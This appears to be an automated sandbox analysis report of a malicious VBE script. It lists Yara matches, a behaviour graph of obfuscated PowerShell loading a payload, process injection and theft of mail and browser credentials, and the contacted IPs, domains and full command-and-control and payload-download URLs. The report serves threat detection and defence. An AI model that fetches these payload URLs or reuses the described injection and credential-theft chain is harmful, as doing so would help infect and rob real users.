Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530632 Sample: 10092024150836 09.10.2024.vbe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 45 www.568060007.xyz 2->45 47 paste.ee 2->47 49 8 other IPs or domains 2->49 57 Multi AV Scanner detection for domain / URL 2->57 59 Suricata IDS alerts for network traffic 2->59 61 Malicious sample detected (through community Yara rule) 2->61 67 10 other signatures 2->67 12 wscript.exe 1 2->12         started        signatures3 63 Performs DNS queries to domains with low reputation 45->63 65 Connects to a pastebin service (likely for C&C) 47->65 process4 signatures5 79 Suspicious powershell command line found 12->79 81 Wscript starts Powershell (via cmd or directly) 12->81 83 Bypasses PowerShell execution policy 12->83 85 2 other signatures 12->85 15 powershell.exe 7 12->15         started        process6 signatures7 95 Suspicious powershell command line found 15->95 97 Obfuscated command line found 15->97 99 Found suspicious powershell code related to unpacking or dynamic code loading 15->99 18 powershell.exe 14 15 15->18         started        22 conhost.exe 15->22         started        process8 dnsIp9 51 ia600102.us.archive.org 207.241.227.242, 443, 49711 INTERNET-ARCHIVEUS United States 18->51 53 www.airgame.store 188.114.96.3, 443, 49724, 49963 CLOUDFLARENETUS European Union 18->53 69 Writes to foreign memory regions 18->69 71 Injects a PE file into a foreign processes 18->71 24 appidtel.exe 18->24         started        signatures10 process11 signatures12 73 Maps a DLL or memory area into another process 24->73 27 QEwzeZKCXN.exe 24->27 injected process13 signatures14 75 Maps a DLL or memory area into another process 27->75 77 Found direct / indirect Syscall (likely to bypass EDR) 27->77 30 dllhost.exe 13 27->30         started        process15 signatures16 87 Tries to steal Mail credentials (via file / registry access) 30->87 89 Tries to harvest and steal browser information (history, passwords, etc) 30->89 91 Modifies the context of a thread in another process (thread injection) 30->91 93 3 other signatures 30->93 33 QEwzeZKCXN.exe 30->33 injected 37 firefox.exe 30->37         started        process17 dnsIp18 39 elitecbdgummies.net 172.96.186.204, 49958, 49959, 49960 SINGLEHOP-LLCUS Canada 33->39 41 568060007.xyz 18.163.12.6, 49954, 49955, 49956 AMAZON-02US United States 33->41 43 www.autoclean.shop 13.248.169.48, 49951, 80 AMAZON-02US United States 33->43 55 Found direct / indirect Syscall (likely to bypass EDR) 33->55 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.248.169.48
 www.autoclean.shop United States
16509 AMAZON-02US false
18.163.12.6
 568060007.xyz United States
16509 AMAZON-02US true
188.114.96.3
 paste.ee European Union
13335 CLOUDFLARENETUS true
207.241.227.242
 ia600102.us.archive.org United States
7941 INTERNET-ARCHIVEUS true
172.96.186.204
 elitecbdgummies.net Canada
32475 SINGLEHOP-LLCUS true

Contacted Domains

Name IP Active
www.autoclean.shop 13.248.169.48 true
elitecbdgummies.net 172.96.186.204 true
568060007.xyz 18.163.12.6 true
ia600102.us.archive.org 207.241.227.242 true
paste.ee 188.114.96.3 true
www.airgame.store 188.114.96.3 true
1ns6mg.vip 3.33.130.190 true
www.elitecbdgummies.net unknown unknown
www.568060007.xyz unknown unknown
www.1ns6mg.vip unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.airgame.store/ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68 true
    		unknown
    https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg true unknown
    https://paste.ee/d/mFPBh/0 true
      		unknown
      http://www.autoclean.shop/fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus= false
        		unknown
        http://www.568060007.xyz/2jpw/ true
          		unknown
          http://www.568060007.xyz/2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68 true
            		unknown
            http://www.elitecbdgummies.net/iaoq/ true
              		unknown
              http://www.airgame.store/ojib/ true
                		unknown